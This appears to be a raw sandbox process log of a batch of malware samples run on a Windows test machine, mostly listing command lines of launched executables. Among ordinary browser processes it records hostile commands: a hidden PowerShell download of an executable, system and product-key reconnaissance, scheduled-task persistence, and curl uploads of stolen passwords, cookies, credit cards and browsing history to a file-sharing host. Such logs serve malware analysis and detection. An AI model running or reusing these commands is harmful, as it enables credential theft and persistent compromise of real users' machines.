C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfb63cc40,0x7ffdfb63cc4c,0x7ffdfb63cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1740,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1720 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2096,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2156,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3064 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3492,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4288,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3576,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3064,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4700,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4944,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7288FB02CAA8AFED10124D7D86A0F655
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSIF7A1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240842921 2 CustomActions!CustomActions.CustomActions.StartApp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe"
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSIFB6B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240843640 8 CustomActions!CustomActions.CustomActions.InstallPing
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=2272,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4308 /prefetch:1
C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3500,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3496,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdfae03cb8,0x7ffdfae03cc8,0x7ffdfae03cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4232,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 820720ED358ACB2F23030A0E73AE6B55 C
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5412,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5136,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4400,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3420,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5052,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:1
C:\Windows\system32\calc.exe
calc.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5072,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5080,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe"
C:\Program Files\Microsoft Office\root\Office16\Winword.exe
"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Windows\System32\drivers\etc\hosts"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js"
C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr
"C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\Admin\AppData\Local\Secure360 Innovations\V"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe"
C:\Windows\SysWOW64\rundll32.exe
